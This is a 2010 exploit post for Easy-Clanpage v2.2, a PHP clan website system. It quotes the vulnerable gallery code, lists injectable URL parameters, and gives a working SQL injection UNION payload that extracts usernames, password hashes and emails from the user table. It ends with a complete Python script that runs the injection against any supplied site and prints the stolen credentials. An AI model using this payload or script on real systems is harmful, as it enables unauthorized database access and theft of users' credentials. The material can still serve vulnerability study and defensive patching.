----------------------------Information------------------------------------------------ +Name : Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit +Autor : Easy Laster +Date : 31.03.2010 +Script : Easy-Clanpage <= v2.2 +Download : Update Version 2.1->2.2 http://www.easy-clanpage.de /?section=downloads&action=viewdl&id=18 +Demo : http://studio.siouxsie-fashion.at +Price : for free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability PHP Code -#######################################################################################- IF(isset($_GET['action'])) { switch($_GET['action']) { case "viewpic": gallery_show_pic($_GET['id']); break; case "gallery": gallery_show_gallery($_GET['id']); break; case "kate": gallery_show_kate($_GET['id']); break; case "comments": gallery_show_pic((int)$_GET['id']); break; case "commentsadd": write_comment('gallery', (int)$_GET['id'], ALLOW_ANONYM, SPAM_NEWS_COMMENT , LIMIT_COMMENTS); break; case "commentsquote": write_comment_qoute('gallery', (int)$_GET['id'],(int)$_GET['quote']); break; case "commentsedit": comments_edit('gallery', (int)$_GET['subid'], (int)$_GET['id'], LIMIT_COMMENTS); break; default: gallery(); } -#######################################################################################- +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=viewpic&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=kate&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=comments&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsquote&id= +Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsedit&id= +SQL Injection +Exploitable : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id= -1111111111+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+ecp_user +where+userID=1--+ ----------------------------------------------------------------------------------------- #Exploit #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, re if len(sys.argv) < 2: print "***************************************************************" print "*************** Easy-Clanpage v2.2 Gallery Hack ***************" print "***************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* Easy-Clanpage <= v2.2 SQL Injection Exploit *" print "* coded by Dr.ChAoS *" print "* *" print "* Usage: *" print "* python exploit.py http://site.de/ecp/ *" print "* *" print "***************************************************************" exit() if len(sys.argv) < 3: id = 1 else: id = sys.argv[2] site = sys.argv[1] if site[-1:] != "/": site += "/" url = site + "index.php?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,username,0x3a,password,0x3a,email,0x23,0x23,0x23,0x23,0x23),4+from+ecp_user+where+userID=" + str(id) + "--" print "Exploiting..." html = urllib2.urlopen(url).read() # I hate regex! data = re.findall(r"#####(.*)\:([0-9a-fA-F]{32})\:(.*)#####", html) if len(data) > 0: print "Success!\n" print "ID: " + str(id) print "Username: " + data[0][0] print "Password: " + data[0][1] print "E-Mail: " + data[0][2] print "\nHave a nice day!" else: print "Exploit failed..."